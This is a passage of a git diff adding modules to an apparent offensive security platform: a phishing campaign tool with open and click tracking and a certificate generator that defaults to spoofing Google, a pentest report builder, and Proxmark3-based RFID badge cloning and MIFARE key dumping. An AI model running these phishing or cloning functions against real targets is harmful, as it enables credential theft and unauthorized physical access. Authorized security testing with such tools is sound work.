subject, smtp_host, int(smtp_port)) + print(f" [+] Campaign created: {cid}") + elif choice == '2': + cid = input(" Campaign ID: ").strip() + result = server.send_campaign(cid) + if result['ok']: + print(f" [+] {result['message']}") + else: + print(f" [-] {result['error']}") + elif choice == '3': + cid = input(" Campaign ID: ").strip() + if server.campaigns.delete_campaign(cid): + print(" [+] Campaign deleted") + else: + print(" [-] Campaign not found") + + +def _cli_templates(server: GoneFishingServer): + """Template management CLI.""" + templates = server.templates.list_templates() + print("\n--- Email Templates ---") + for name, tpl in templates.items(): + tag = " (built-in)" if tpl.get('builtin') else " (custom)" + print(f" {name}{tag}") + if tpl.get('subject'): + print(f" Subject: {tpl['subject']}") + + print("\n 1 — Create Custom Template") + print(" 2 — Delete Custom Template") + print(" 0 — Back") + + choice = input(" Select: ").strip() + if choice == '1': + name = input(" Template Name: ").strip() + if not name: + return + subject = input(" Subject: ").strip() + print(" Enter HTML body (end with empty line):") + lines = [] + while True: + line = input() + if not line: + break + lines.append(line) + html = '\n'.join(lines) + text = input(" Plain text fallback: ").strip() + server.templates.save_template(name, html, text, subject) + print(f" [+] Template '{name}' saved") + elif choice == '2': + name = input(" Template Name to delete: ").strip() + if server.templates.delete_template(name): + print(f" [+] Template '{name}' deleted") + else: + print(" [-] Template not found (or is built-in)") + + +def _cli_relay(server: GoneFishingServer): + """SMTP relay control.""" + status = server.relay_status() + if status['running']: + print(f"\n SMTP Relay: RUNNING on {status['host']}:{status['port']}") + print(f" Received messages: {status['received']}") + stop = input(" Stop relay? [y/N]: ").strip().lower() + if stop == 'y': + server.stop_relay() + print(" [+] Relay stopped") + else: + print("\n SMTP Relay: STOPPED") + host = input(" Bind host [0.0.0.0]: ").strip() or "0.0.0.0" + port = input(" Bind port [2525]: ").strip() or "2525" + result = server.start_relay(host, int(port)) + print(f" [+] {result['message']}") + + +def _cli_generate_cert(server: GoneFishingServer): + """Generate spoofed certificate.""" + print("\n--- Certificate Generator ---") + print(" Generate a self-signed TLS certificate with custom fields.") + cn = input(" Common Name (CN) [mail.google.com]: ").strip() or "mail.google.com" + org = input(" Organization (O) [Google LLC]: ").strip() or "Google LLC" + ou = input(" Org Unit (OU) []: ").strip() + country = input(" Country (C) [US]: ").strip() or "US" + + result = server.generate_cert(cn=cn, org=org, ou=ou, country=country) + if result['ok']: + print(f" [+] {result['message']}") + print(f" Cert: {result['cert']}") + print(f" Key: {result['key']}") + else: + print(f" [-] {result['error']}") + + +def _cli_tracking(server: GoneFishingServer): + """View tracking stats for campaigns.""" + campaigns = server.campaigns.list_campaigns() + if not campaigns: + print("\n No campaigns to show stats for") + return + print("\n--- Campaign Tracking ---") + for c in campaigns: + stats = server.campaigns.get_stats(c['id']) + print(f"\n Campaign: {c['name']} [{c['id']}]") + print(f" Status: {c['status']}") + print(f" Total Targets: {stats.get('total', 0)}") + print(f" Sent: {stats.get('sent', 0)}") + print(f" Opened: {stats.get('opened', 0)} ({stats.get('open_rate', '0%')})") + print(f" Clicked: {stats.get('clicked', 0)} ({stats.get('click_rate', '0%')})") + + # Show per-target details + camp = server.campaigns.get_campaign(c['id']) + if camp: + for t in camp['targets']: + status_icon = '✓' if t.get('sent_at') else '·' + open_icon = '👁' if t.get('opened_at') else '' + click_icon = '🖱' if t.get('clicked_at') else '' + print(f" {status_icon} {t['email']} {open_icon} {click_icon}") + + +def _cli_test_smtp(server: GoneFishingServer): + """Test SMTP connection.""" + host = input(" SMTP Host: ").strip() + if not host: + return + port = input(" Port [25]: ").strip() or "25" + print(f" Testing {host}:{port}...") + result = server.test_smtp(host, int(port)) + if result['ok']: + print(f" [+] {result['message']}") + if result.get('banner'): + print(f" Banner: {result['banner'][:200]}") + else: + print(f" [-] {result['error']}") diff --git a/modules/report_engine.py b/modules/report_engine.py new file mode 100644 index 0000000..3f333df --- /dev/null +++ b/modules/report_engine.py @@ -0,0 +1,499 @@ +"""AUTARCH Reporting Engine + +Structured pentest report builder with findings, CVSS scoring, evidence, +and export to HTML/Markdown/JSON. +""" + +DESCRIPTION = "Pentest report builder & exporter" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import json +import time +import uuid +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any +from dataclasses import dataclass, field, asdict +import threading + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Finding Severity & CVSS ────────────────────────────────────────────────── + +SEVERITY_MAP = { + 'critical': {'color': '#dc2626', 'score_range': '9.0-10.0', 'order': 0}, + 'high': {'color': '#ef4444', 'score_range': '7.0-8.9', 'order': 1}, + 'medium': {'color': '#f59e0b', 'score_range': '4.0-6.9', 'order': 2}, + 'low': {'color': '#22c55e', 'score_range': '0.1-3.9', 'order': 3}, + 'info': {'color': '#6366f1', 'score_range': '0.0', 'order': 4}, +} + +FINDING_TEMPLATES = [ + { + 'id': 'sqli', + 'title': 'SQL Injection', + 'severity': 'critical', + 'cvss': 9.8, + 'description': 'The application is vulnerable to SQL injection, allowing an attacker to manipulate database queries.', + 'impact': 'Complete database compromise, data exfiltration, authentication bypass, potential remote code execution.', + 'remediation': 'Use parameterized queries/prepared statements. Implement input validation and WAF rules.', + 'references': ['OWASP Top 10: A03:2021', 'CWE-89'], + }, + { + 'id': 'xss', + 'title': 'Cross-Site Scripting (XSS)', + 'severity': 'high', + 'cvss': 7.5, + 'description': 'The application reflects user input without proper sanitization, enabling script injection.', + 'impact': 'Session hijacking, credential theft, defacement, malware distribution.', + 'remediation': 'Encode all output, implement Content-Security-Policy, use framework auto-escaping.', + 'references': ['OWASP Top 10: A03:2021', 'CWE-79'], + }, + { + 'id': 'broken_auth', + 'title': 'Broken Authentication', + 'severity': 'critical', + 'cvss': 9.1, + 'description': 'Authentication mechanisms can be bypassed or abused to gain unauthorized access.', + 'impact': 'Account takeover, privilege escalation, unauthorized data access.', + 'remediation': 'Implement MFA, rate limiting, secure session management, strong password policies.', + 'references': ['OWASP Top 10: A07:2021', 'CWE-287'], + }, + { + 'id': 'idor', + 'title': 'Insecure Direct Object Reference (IDOR)', + 'severity': 'high', + 'cvss': 7.5, + 'description': 'The application exposes internal object references that can be manipulated to access unauthorized resources.', + 'impact': 'Unauthorized access to other users\' data, horizontal privilege escalation.', + 'remediation': 'Implement proper access control checks, use indirect references.', + 'references': ['OWASP Top 10: A01:2021', 'CWE-639'], + }, + { + 'id': 'missing_headers', + 'title': 'Missing Security Headers', + 'severity': 'low', + 'cvss': 3.1, + 'description': 'The application does not implement recommended security headers.', + 'impact': 'Increased attack surface for clickjacking, MIME sniffing, and XSS attacks.', + 'remediation': 'Implement CSP, X-Frame-Options, X-Content-Type-Options, HSTS headers.', + 'references': ['OWASP Secure Headers Project'], + }, + { + 'id': 'weak_ssl', + 'title': 'Weak SSL/TLS Configuration', + 'severity': 'medium', + 'cvss': 5.3, + 'description': 'The server supports weak SSL/TLS protocols or cipher suites.', + 'impact': 'Potential for traffic interception via downgrade attacks.', + 'remediation': 'Disable TLS 1.0/1.1, remove weak ciphers, enable HSTS.', + 'references': ['CWE-326', 'NIST SP 800-52'], + }, + { + 'id': 'info_disclosure', + 'title': 'Information Disclosure', + 'severity': 'medium', + 'cvss': 5.0, + 'description': 'The application reveals sensitive information such as server versions, stack traces, or internal paths.', + 'impact': 'Aids attackers in fingerprinting and planning targeted attacks.', + 'remediation': 'Remove version headers, disable debug modes, implement custom error pages.', + 'references': ['CWE-200'], + }, + { + 'id': 'default_creds', + 'title': 'Default Credentials', + 'severity': 'critical', + 'cvss': 9.8, + 'description': 'The system uses default or well-known credentials that have not been changed.', + 'impact': 'Complete system compromise with minimal effort.', + 'remediation': 'Enforce password change on first login, remove default accounts.', + 'references': ['CWE-798'], + }, + { + 'id': 'eternalblue', + 'title': 'MS17-010 (EternalBlue)', + 'severity': 'critical', + 'cvss': 9.8, + 'description': 'The target is vulnerable to the EternalBlue SMB exploit (MS17-010).', + 'impact': 'Remote code execution with SYSTEM privileges, wormable exploit.', + 'remediation': 'Apply Microsoft patch MS17-010, disable SMBv1.', + 'references': ['CVE-2017-0144', 'MS17-010'], + }, + { + 'id': 'open_ports', + 'title': 'Unnecessary Open Ports', + 'severity': 'low', + 'cvss': 3.0, + 'description': 'The target exposes network services that are not required for operation.', + 'impact': 'Increased attack surface, potential exploitation of exposed services.', + 'remediation': 'Close unnecessary ports, implement firewall rules, use network segmentation.', + 'references': ['CIS Benchmarks'], + }, +] + + +# ── Report Engine ───────────────────────────────────────────────────────────── + +class ReportEngine: + """Pentest report builder with findings management and export.""" + + def __init__(self): + self._data_dir = os.path.join(get_data_dir(), 'reports') + os.makedirs(self._data_dir, exist_ok=True) + + # ── Report CRUD ─────────────────────────────────────────────────────── + + def create_report(self, title: str, client: str = '', + scope: str = '', methodology: str = '') -> dict: + """Create a new report.""" + report_id = str(uuid.uuid4())[:8] + report = { + 'id': report_id, + 'title': title, + 'client': client, + 'scope': scope, + 'methodology': methodology or 'OWASP Testing Guide v4.2 / PTES', + 'executive_summary': '', + 'findings': [], + 'created_at': datetime.now(timezone.utc).isoformat(), + 'updated_at': datetime.now(timezone.utc).isoformat(), + 'status': 'draft', + 'author': 'AUTARCH', + } + self._save_report(report) + return {'ok': True, 'report': report} + + def get_report(self, report_id: str) -> Optional[dict]: + path = os.path.join(self._data_dir, f'{report_id}.json') + if not os.path.exists(path): + return None + with open(path, 'r') as f: + return json.load(f) + + def update_report(self, report_id: str, updates: dict) -> dict: + report = self.get_report(report_id) + if not report: + return {'ok': False, 'error': 'Report not found'} + for k, v in updates.items(): + if k in report and k not in ('id', 'created_at'): + report[k] = v + report['updated_at'] = datetime.now(timezone.utc).isoformat() + self._save_report(report) + return {'ok': True, 'report': report} + + def delete_report(self, report_id: str) -> dict: + path = os.path.join(self._data_dir, f'{report_id}.json') + if os.path.exists(path): + os.remove(path) + return {'ok': True} + return {'ok': False, 'error': 'Report not found'} + + def list_reports(self) -> List[dict]: + reports = [] + for f in Path(self._data_dir).glob('*.json'): + try: + with open(f, 'r') as fh: + r = json.load(fh) + reports.append({ + 'id': r['id'], + 'title': r['title'], + 'client': r.get('client', ''), + 'status': r.get('status', 'draft'), + 'findings_count': len(r.get('findings', [])), + 'created_at': r.get('created_at', ''), + 'updated_at': r.get('updated_at', ''), + }) + except Exception: + continue + reports.sort(key=lambda r: r.get('updated_at', ''), reverse=True) + return reports + + # ── Finding Management ──────────────────────────────────────────────── + + def add_finding(self, report_id: str, finding: dict) -> dict: + report = self.get_report(report_id) + if not report: + return {'ok': False, 'error': 'Report not found'} + finding['id'] = str(uuid.uuid4())[:8] + finding.setdefault('severity', 'medium') + finding.setdefault('cvss', 5.0) + finding.setdefault('status', 'open') + finding.setdefault('evidence', []) + report['findings'].append(finding) + report['updated_at'] = datetime.now(timezone.utc).isoformat() + self._save_report(report) + return {'ok': True, 'finding': finding} + + def update_finding(self, report_id: str, finding_id: str, + updates: dict) -> dict: + report = self.get_report(report_id) + if not report: + return {'ok': False, 'error': 'Report not found'} + for f in report['findings']: + if f['id'] == finding_id: + for k, v in updates.items(): + if k != 'id': + f[k] = v + report['updated_at'] = datetime.now(timezone.utc).isoformat() + self._save_report(report) + return {'ok': True, 'finding': f} + return {'ok': False, 'error': 'Finding not found'} + + def delete_finding(self, report_id: str, finding_id: str) -> dict: + report = self.get_report(report_id) + if not report: + return {'ok': False, 'error': 'Report not found'} + report['findings'] = [f for f in report['findings'] + if f['id'] != finding_id] + report['updated_at'] = datetime.now(timezone.utc).isoformat() + self._save_report(report) + return {'ok': True} + + def get_finding_templates(self) -> List[dict]: + return FINDING_TEMPLATES + + # ── Export ──────────────────────────────────────────────────────────── + + def export_html(self, report_id: str) -> Optional[str]: + """Export report as styled HTML.""" + report = self.get_report(report_id) + if not report: + return None + + findings_html = '' + sorted_findings = sorted(report.get('findings', []), + key=lambda f: SEVERITY_MAP.get(f.get('severity', 'info'), {}).get('order', 5)) + for i, f in enumerate(sorted_findings, 1): + sev = f.get('severity', 'info') + color = SEVERITY_MAP.get(sev, {}).get('color', '#666') + findings_html += f''' +
+

{i}. {_esc(f.get('title', 'Untitled'))}

+
+ {sev.upper()} + CVSS: {f.get('cvss', 'N/A')} + Status: {f.get('status', 'open')} +
+

Description

{_esc(f.get('description', ''))}

+

Impact

{_esc(f.get('impact', ''))}

+

Remediation

{_esc(f.get('remediation', ''))}

+ {'

Evidence

' + _esc(chr(10).join(f.get('evidence', []))) + '
' if f.get('evidence') else ''} + {'

References

    ' + ''.join('
  • ' + _esc(r) + '
    • ' for r in f.get('references', [])) + '
' if f.get('references') else ''} +
''' + + # Summary stats + severity_counts = {} + for f in report.get('findings', []): + s = f.get('severity', 'info') + severity_counts[s] = severity_counts.get(s, 0) + 1 + + summary_html = '
' + for sev in ['critical', 'high', 'medium', 'low', 'info']: + count = severity_counts.get(sev, 0) + color = SEVERITY_MAP.get(sev, {}).get('color', '#666') + summary_html += f'
{count}{sev.upper()}
' + summary_html += '
' + + html = f''' +{_esc(report.get('title', 'Report'))} + +

{_esc(report.get('title', 'Penetration Test Report'))}

+
+
Client: {_esc(report.get('client', 'N/A'))}
+
Date: {report.get('created_at', '')[:10]}
+
Author: {_esc(report.get('author', 'AUTARCH'))}
+
Status: {report.get('status', 'draft').upper()}
+
+ +

Executive Summary

+

{_esc(report.get('executive_summary', 'No executive summary provided.'))}

+ +

Scope

+

{_esc(report.get('scope', 'No scope defined.'))}

+ +

Methodology

+

{_esc(report.get('methodology', ''))}

+ +

Findings Overview

+{summary_html} + +

Detailed Findings

+{findings_html if findings_html else '

No findings recorded.

'} + +
+ Generated by AUTARCH Security Platform — {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M UTC')} +
+''' + return html + + def export_markdown(self, report_id: str) -> Optional[str]: + """Export report as Markdown.""" + report = self.get_report(report_id) + if not report: + return None + + md = f"# {report.get('title', 'Report')}\n\n" + md += f"**Client:** {report.get('client', 'N/A')} \n" + md += f"**Date:** {report.get('created_at', '')[:10]} \n" + md += f"**Author:** {report.get('author', 'AUTARCH')} \n" + md += f"**Status:** {report.get('status', 'draft')} \n\n" + + md += "## Executive Summary\n\n" + md += report.get('executive_summary', 'N/A') + "\n\n" + + md += "## Scope\n\n" + md += report.get('scope', 'N/A') + "\n\n" + + md += "## Findings\n\n" + sorted_findings = sorted(report.get('findings', []), + key=lambda f: SEVERITY_MAP.get(f.get('severity', 'info'), {}).get('order', 5)) + for i, f in enumerate(sorted_findings, 1): + md += f"### {i}. [{f.get('severity', 'info').upper()}] {f.get('title', 'Untitled')}\n\n" + md += f"**CVSS:** {f.get('cvss', 'N/A')} | **Status:** {f.get('status', 'open')}\n\n" + md += f"**Description:** {f.get('description', '')}\n\n" + md += f"**Impact:** {f.get('impact', '')}\n\n" + md += f"**Remediation:** {f.get('remediation', '')}\n\n" + if f.get('evidence'): + md += "**Evidence:**\n```\n" + '\n'.join(f['evidence']) + "\n```\n\n" + if f.get('references'): + md += "**References:** " + ', '.join(f['references']) + "\n\n" + md += "---\n\n" + + md += f"\n*Generated by AUTARCH — {datetime.now(timezone.utc).strftime('%Y-%m-%d')}*\n" + return md + + def export_json(self, report_id: str) -> Optional[str]: + report = self.get_report(report_id) + if not report: + return None + return json.dumps(report, indent=2) + + # ── Internal ────────────────────────────────────────────────────────── + + def _save_report(self, report: dict): + path = os.path.join(self._data_dir, f'{report["id"]}.json') + with open(path, 'w') as f: + json.dump(report, f, indent=2) + + +def _esc(s: str) -> str: + return (s or '').replace('&', '&').replace('<', '<').replace('>', '>') + + +# ── Singleton ───────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_report_engine() -> ReportEngine: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = ReportEngine() + return _instance + + +# ── CLI ─────────────────────────────────────────────────────────────────────── + +def run(): + """Interactive CLI for Reporting Engine.""" + svc = get_report_engine() + + while True: + print("\n╔═══════════════════════════════════════╗") + print("║ REPORTING ENGINE ║") + print("╠═══════════════════════════════════════╣") + print("║ 1 — List Reports ║") + print("║ 2 — Create Report ║") + print("║ 3 — Add Finding ║") + print("║ 4 — Export Report ║") + print("║ 5 — Finding Templates ║") + print("║ 0 — Back ║") + print("╚═══════════════════════════════════════╝") + + choice = input("\n Select: ").strip() + + if choice == '0': + break + elif choice == '1': + reports = svc.list_reports() + if not reports: + print("\n No reports.") + continue + for r in reports: + print(f" [{r['id']}] {r['title']} — {r['findings_count']} findings " + f"({r['status']}) {r['updated_at'][:10]}") + elif choice == '2': + title = input(" Report title: ").strip() + client = input(" Client name: ").strip() + scope = input(" Scope: ").strip() + r = svc.create_report(title, client, scope) + print(f" Created report: {r['report']['id']}") + elif choice == '3': + rid = input(" Report ID: ").strip() + print(" Available templates:") + for i, t in enumerate(FINDING_TEMPLATES, 1): + print(f" {i}. [{t['severity'].upper()}] {t['title']}") + sel = input(" Template # (0 for custom): ").strip() + if sel and sel != '0': + idx = int(sel) - 1 + if 0 <= idx < len(FINDING_TEMPLATES): + f = FINDING_TEMPLATES[idx].copy() + f.pop('id', None) + r = svc.add_finding(rid, f) + if r['ok']: + print(f" Added: {f['title']}") + else: + title = input(" Title: ").strip() + severity = input(" Severity (critical/high/medium/low/info): ").strip() + desc = input(" Description: ").strip() + r = svc.add_finding(rid, {'title': title, 'severity': severity, + 'description': desc}) + if r['ok']: + print(f" Added finding: {r['finding']['id']}") + elif choice == '4': + rid = input(" Report ID: ").strip() + fmt = input(" Format (html/markdown/json): ").strip() or 'html' + if fmt == 'html': + content = svc.export_html(rid) + elif fmt == 'markdown': + content = svc.export_markdown(rid) + else: + content = svc.export_json(rid) + if content: + ext = {'html': 'html', 'markdown': 'md', 'json': 'json'}.get(fmt, 'txt') + outpath = os.path.join(svc._data_dir, f'{rid}.{ext}') + with open(outpath, 'w') as f: + f.write(content) + print(f" Exported to: {outpath}") + else: + print(" Report not found.") + elif choice == '5': + for t in FINDING_TEMPLATES: + print(f" [{t['severity'].upper():8s}] {t['title']} (CVSS {t['cvss']})") diff --git a/modules/rfid_tools.py b/modules/rfid_tools.py new file mode 100644 index 0000000..70166b7 --- /dev/null +++ b/modules/rfid_tools.py @@ -0,0 +1,455 @@ +"""AUTARCH RFID/NFC Tools + +Proxmark3 integration, badge cloning, NFC read/write, MIFARE operations, +and card analysis for physical access security testing. +""" + +DESCRIPTION = "RFID/NFC badge cloning & analysis" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import re +import json +import time +import shutil +import subprocess +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Card Types ─────────────────────────────────────────────────────────────── + +CARD_TYPES = { + 'em410x': {'name': 'EM410x', 'frequency': '125 kHz', 'category': 'LF'}, + 'hid_prox': {'name': 'HID ProxCard', 'frequency': '125 kHz', 'category': 'LF'}, + 't5577': {'name': 'T5577', 'frequency': '125 kHz', 'category': 'LF', 'writable': True}, + 'mifare_classic_1k': {'name': 'MIFARE Classic 1K', 'frequency': '13.56 MHz', 'category': 'HF'}, + 'mifare_classic_4k': {'name': 'MIFARE Classic 4K', 'frequency': '13.56 MHz', 'category': 'HF'}, + 'mifare_ultralight': {'name': 'MIFARE Ultralight', 'frequency': '13.56 MHz', 'category': 'HF'}, + 'mifare_desfire': {'name': 'MIFARE DESFire', 'frequency': '13.56 MHz', 'category': 'HF'}, + 'ntag213': {'name': 'NTAG213', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True}, + 'ntag215': {'name': 'NTAG215', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True}, + 'ntag216': {'name': 'NTAG216', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True}, + 'iclass': {'name': 'iCLASS', 'frequency': '13.56 MHz', 'category': 'HF'}, + 'iso14443a': {'name': 'ISO 14443A', 'frequency': '13.56 MHz', 'category': 'HF'}, + 'iso15693': {'name': 'ISO 15693', 'frequency': '13.56 MHz', 'category': 'HF'}, + 'legic': {'name': 'LEGIC', 'frequency': '13.56 MHz', 'category': 'HF'}, +} + +MIFARE_DEFAULT_KEYS = [ + 'FFFFFFFFFFFF', 'A0A1A2A3A4A5', 'D3F7D3F7D3F7', + '000000000000', 'B0B1B2B3B4B5', '4D3A99C351DD', + '1A982C7E459A', 'AABBCCDDEEFF', '714C5C886E97', + '587EE5F9350F', 'A0478CC39091', '533CB6C723F6', +] + + +# ── RFID Manager ───────────────────────────────────────────────────────────── + +class RFIDManager: + """RFID/NFC tool management via Proxmark3 and nfc-tools.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'rfid') + os.makedirs(self.data_dir, exist_ok=True) + self.dumps_dir = os.path.join(self.data_dir, 'dumps') + os.makedirs(self.dumps_dir, exist_ok=True) + + # Tool discovery + self.pm3_client = find_tool('pm3') or find_tool('proxmark3') or shutil.which('pm3') or shutil.which('proxmark3') + self.nfc_list = shutil.which('nfc-list') + self.nfc_poll = shutil.which('nfc-poll') + self.nfc_mfclassic = shutil.which('nfc-mfclassic') + + self.cards: List[Dict] = [] + self.last_read: Optional[Dict] = None + + def get_tools_status(self) -> Dict: + """Check available tools.""" + return { + 'proxmark3': self.pm3_client is not None, + 'nfc-list': self.nfc_list is not None, + 'nfc-mfclassic': self.nfc_mfclassic is not None, + 'card_types': len(CARD_TYPES), + 'saved_cards': len(self.cards) + } + + # ── Proxmark3 Commands ─────────────────────────────────────────────── + + def _pm3_cmd(self, command: str, timeout: int = 15) -> Dict: + """Execute Proxmark3 command.""" + if not self.pm3_client: + return {'ok': False, 'error': 'Proxmark3 client not found'} + + try: + result = subprocess.run( + [self.pm3_client, '-c', command], + capture_output=True, text=True, timeout=timeout + ) + return { + 'ok': result.returncode == 0, + 'stdout': result.stdout, + 'stderr': result.stderr + } + except subprocess.TimeoutExpired: + return {'ok': False, 'error': f'Command timed out: {command}'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Low Frequency (125 kHz) ────────────────────────────────────────── + + def lf_search(self) -> Dict: + """Search for LF (125 kHz) cards.""" + result = self._pm3_cmd('lf search') + if not result['ok']: + return result + + output = result['stdout'] + card = {'frequency': '125 kHz', 'category': 'LF'} + + # Parse EM410x + em_match = re.search(r'EM\s*410x.*?ID[:\s]*([A-Fa-f0-9]+)', output, re.I) + if em_match: + card['type'] = 'em410x' + card['id'] = em_match.group(1) + card['name'] = 'EM410x' + + # Parse HID + hid_match = re.search(r'HID.*?Card.*?([A-Fa-f0-9]+)', output, re.I) + if hid_match: + card['type'] = 'hid_prox' + card['id'] = hid_match.group(1) + card['name'] = 'HID ProxCard' + + if 'id' in card: + card['raw_output'] = output + self.last_read = card + return {'ok': True, 'card': card} + + return {'ok': False, 'error': 'No LF card found', 'raw': output} + + def lf_read_em410x(self) -> Dict: + """Read EM410x card.""" + result = self._pm3_cmd('lf em 410x reader') + if not result['ok']: + return result + + match = re.search(r'EM\s*410x\s+ID[:\s]*([A-Fa-f0-9]+)', result['stdout'], re.I) + if match: + card = { + 'type': 'em410x', 'id': match.group(1), + 'name': 'EM410x', 'frequency': '125 kHz' + } + self.last_read = card + return {'ok': True, 'card': card} + return {'ok': False, 'error': 'Could not read EM410x', 'raw': result['stdout']} + + def lf_clone_em410x(self, card_id: str) -> Dict: + """Clone EM410x ID to T5577 card.""" + result = self._pm3_cmd(f'lf em 410x clone --id {card_id}') + return { + 'ok': 'written' in result.get('stdout', '').lower() or result['ok'], + 'message': f'Cloned EM410x ID {card_id}' if result['ok'] else result.get('error', ''), + 'raw': result.get('stdout', '') + } + + def lf_sim_em410x(self, card_id: str) -> Dict: + """Simulate EM410x card.""" + result = self._pm3_cmd(f'lf em 410x sim --id {card_id}', timeout=30) + return { + 'ok': result['ok'], + 'message': f'Simulating EM410x ID {card_id}', + 'raw': result.get('stdout', '') + } + + # ── High Frequency (13.56 MHz) ─────────────────────────────────────── + + def hf_search(self) -> Dict: + """Search for HF (13.56 MHz) cards.""" + result = self._pm3_cmd('hf search') + if not result['ok']: + return result + + output = result['stdout'] + card = {'frequency': '13.56 MHz', 'category': 'HF'} + + # Parse UID + uid_match = re.search(r'UID[:\s]*([A-Fa-f0-9\s]+)', output, re.I) + if uid_match: + card['uid'] = uid_match.group(1).replace(' ', '').strip() + + # Parse ATQA/SAK + atqa_match = re.search(r'ATQA[:\s]*([A-Fa-f0-9\s]+)', output, re.I) + if atqa_match: + card['atqa'] = atqa_match.group(1).strip() + sak_match = re.search(r'SAK[:\s]*([A-Fa-f0-9]+)', output, re.I) + if sak_match: + card['sak'] = sak_match.group(1).strip() + + # Detect type + if 'mifare classic 1k' in output.lower(): + card['type'] = 'mifare_classic_1k' + card['name'] = 'MIFARE Classic 1K' + elif 'mifare classic 4k' in output.lower(): + card['type'] = 'mifare_classic_4k' + card['name'] = 'MIFARE Classic 4K' + elif 'ultralight' in output.lower() or 'ntag' in output.lower(): + card['type'] = 'mifare_ultralight' + card['name'] = 'MIFARE Ultralight/NTAG' + elif 'desfire' in output.lower(): + card['type'] = 'mifare_desfire' + card['name'] = 'MIFARE DESFire' + elif 'iso14443' in output.lower(): + card['type'] = 'iso14443a' + card['name'] = 'ISO 14443A' + + if 'uid' in card: + card['raw_output'] = output + self.last_read = card + return {'ok': True, 'card': card} + + return {'ok': False, 'error': 'No HF card found', 'raw': output} + + def hf_dump_mifare(self, keys_file: str = None) -> Dict: + """Dump MIFARE Classic card data.""" + cmd = 'hf mf autopwn' + if keys_file: + cmd += f' -f {keys_file}' + + result = self._pm3_cmd(cmd, timeout=120) + if not result['ok']: + return result + + output = result['stdout'] + + # Look for dump file + dump_match = re.search(r'saved.*?(\S+\.bin)', output, re.I) + if dump_match: + dump_file = dump_match.group(1) + # Copy to our dumps directory + dest = os.path.join(self.dumps_dir, Path(dump_file).name) + if os.path.exists(dump_file): + shutil.copy2(dump_file, dest) + + return { + 'ok': True, + 'dump_file': dest, + 'message': 'MIFARE dump complete', + 'raw': output + } + + # Check for found keys + keys = re.findall(r'key\s*[AB][:\s]*([A-Fa-f0-9]{12})', output, re.I) + if keys: + return { + 'ok': True, + 'keys_found': list(set(keys)), + 'message': f'Found {len(set(keys))} keys', + 'raw': output + } + + return {'ok': False, 'error': 'Dump failed', 'raw': output} + + def hf_clone_mifare(self, dump_file: str) -> Dict: + """Write MIFARE dump to blank card.""" + result = self._pm3_cmd(f'hf mf restore -f {dump_file}', timeout=60) + return { + 'ok': 'restored' in result.get('stdout', '').lower() or result['ok'], + 'message': 'Card cloned' if result['ok'] else 'Clone failed', + 'raw': result.get('stdout', '') + } + + # ── NFC Operations (via libnfc) ────────────────────────────────────── + + def nfc_scan(self) -> Dict: + """Scan for NFC tags using libnfc.""" + if not self.nfc_list: + return {'ok': False, 'error': 'nfc-list not found (install libnfc)'} + + try: + result = subprocess.run( + [self.nfc_list], capture_output=True, text=True, timeout=10 + ) + tags = [] + for line in result.stdout.splitlines(): + uid_match = re.search(r'UID.*?:\s*([A-Fa-f0-9\s:]+)', line, re.I) + if uid_match: + tags.append({ + 'uid': uid_match.group(1).replace(' ', '').replace(':', ''), + 'raw': line.strip() + }) + return {'ok': True, 'tags': tags, 'count': len(tags)} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Card Database ──────────────────────────────────────────────────── + + def save_card(self, card: Dict, name: str = None) -> Dict: + """Save card data to database.""" + card['saved_at'] = datetime.now(timezone.utc).isoformat() + card['display_name'] = name or card.get('name', 'Unknown Card') + # Remove raw output to save space + card.pop('raw_output', None) + self.cards.append(card) + self._save_cards() + return {'ok': True, 'count': len(self.cards)} + + def get_saved_cards(self) -> List[Dict]: + """List saved cards.""" + return self.cards + + def delete_card(self, index: int) -> Dict: + """Delete saved card by index.""" + if 0 <= index < len(self.cards): + self.cards.pop(index) + self._save_cards() + return {'ok': True} + return {'ok': False, 'error': 'Invalid index'} + + def _save_cards(self): + cards_file = os.path.join(self.data_dir, 'cards.json') + with open(cards_file, 'w') as f: + json.dump(self.cards, f, indent=2) + + def _load_cards(self): + cards_file = os.path.join(self.data_dir, 'cards.json') + if os.path.exists(cards_file): + try: + with open(cards_file) as f: + self.cards = json.load(f) + except Exception: + pass + + def list_dumps(self) -> List[Dict]: + """List saved card dumps.""" + dumps = [] + for f in Path(self.dumps_dir).iterdir(): + if f.is_file(): + dumps.append({ + 'name': f.name, 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat() + }) + return dumps + + def get_default_keys(self) -> List[str]: + """Return common MIFARE default keys.""" + return MIFARE_DEFAULT_KEYS + + def get_card_types(self) -> Dict: + """Return supported card type info.""" + return CARD_TYPES + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_rfid_manager() -> RFIDManager: + global _instance + if _instance is None: + _instance = RFIDManager() + _instance._load_cards() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for RFID/NFC module.""" + mgr = get_rfid_manager() + + while True: + tools = mgr.get_tools_status() + print(f"\n{'='*60}") + print(f" RFID / NFC Tools") + print(f"{'='*60}") + print(f" Proxmark3: {'OK' if tools['proxmark3'] else 'NOT FOUND'}") + print(f" libnfc: {'OK' if tools['nfc-list'] else 'NOT FOUND'}") + print(f" Saved cards: {tools['saved_cards']}") + print() + print(" 1 — LF Search (125 kHz)") + print(" 2 — HF Search (13.56 MHz)") + print(" 3 — Read EM410x") + print(" 4 — Clone EM410x to T5577") + print(" 5 — Dump MIFARE Classic") 